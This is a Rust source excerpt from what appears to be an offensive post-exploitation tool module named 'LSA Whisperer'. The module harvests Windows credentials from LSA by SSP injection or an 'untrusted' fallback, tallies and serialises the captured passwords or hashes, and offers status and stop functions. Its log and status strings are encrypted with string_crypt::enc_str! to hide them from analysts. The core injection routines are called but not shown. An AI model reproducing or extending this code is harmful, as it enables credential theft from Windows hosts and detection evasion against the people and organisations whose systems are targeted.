/// Harvest credentials from LSA using the specified method.
///
/// Returns a JSON-encoded credential list compatible with the `HarvestLSASS`
/// result format for consistency.
pub fn harvest_lsa(method: &common::LsaMethod, timeout_secs: u64) -> Result<String> {
    // Reset cancellation flag.
    CANCELLED.store(false, Ordering::Relaxed);

    let credentials = match method {
        common::LsaMethod::Untrusted => harvest_untrusted(timeout_secs)?,
        common::LsaMethod::SspInject => harvest_ssp_inject(timeout_secs)?,
        common::LsaMethod::Auto => {
            // Try SSP injection first (requires admin); fall back to untrusted.
            match harvest_ssp_inject(timeout_secs) {
                Ok(creds) if !creds.is_empty() => creds,
                Ok(_) => {
                    log::info!(
                        "{}",
                        String::from_utf8_lossy(&string_crypt::enc_str!(
                            "LSA Whisperer: SSP injection returned empty, trying untrusted"
                        ))
                        .trim_end_matches('\0')
                    );
                    harvest_untrusted(timeout_secs)?
                }
                Err(_) => harvest_untrusted(timeout_secs)?,
            }
        }
    };

    CRED_COUNT.fetch_add(credentials.len(), Ordering::Relaxed);

    // Serialize in the same format as lsass_harvest::HarvestResult.
    let result = serde_json::json!({
        "credentials": credentials,
        "method": match method {
            common::LsaMethod::Untrusted => "untrusted",
            common::LsaMethod::SspInject => "ssp_inject",
            common::LsaMethod::Auto => "auto",
        },
        "credential_guard_bypass": false,
    });

    serde_json::to_string(&result).context("failed to serialize LSA harvest result")
}

/// Return the current status of the LSA Whisperer subsystem.
pub fn whisperer_status() -> Result<String> {
    let status = WhispererStatus {
        active_method: if SSP_INJECTED.load(Ordering::Relaxed) {
            Some(String::from_utf8_lossy(&string_crypt::enc_str!("ssp_inject"))
                .trim_end_matches('\0')
                .to_string())
        } else {
            None
        },
        credentials_captured: CRED_COUNT.load(Ordering::Relaxed),
        ssp_injected: SSP_INJECTED.load(Ordering::Relaxed),
        lsa_connected: false, // Connections are ephemeral per-harvest
    };

    serde_json::to_string(&status).context("failed to serialize LSA Whisperer status")
}

/// Stop the LSA Whisperer: cancel any in-progress operation, clear the buffer.
pub fn whisperer_stop() -> Result<String> {
    CANCELLED.store(true, Ordering::Relaxed);

    // Clear the credential buffer.
    {
        let mut buf = CREDENTIAL_BUFFER.lock().unwrap();
        for cred in buf.iter_mut() {
            let mut pw_bytes = std::mem::take(&mut cred.password_or_hash).into_bytes();
            secure_zero(&mut pw_bytes);
        }
        buf.clear();
    }

    SSP_INJECTED.store(false, Ordering::Relaxed);
    CRED_COUNT.store(0, Ordering::Relaxed);

    log::info!(
        "{}",
        String::from_utf8_lossy(&string_crypt::enc_str!(
            "LSA Whisperer: stopped, buffer cleared"
        ))
        .trim_end_matches('\0')
    );

    Ok(String::from_utf8_lossy(&string_crypt::enc_str!("LSA Whisperer stopped"))
        .trim_end_matches('\0')
        .to_string())
}
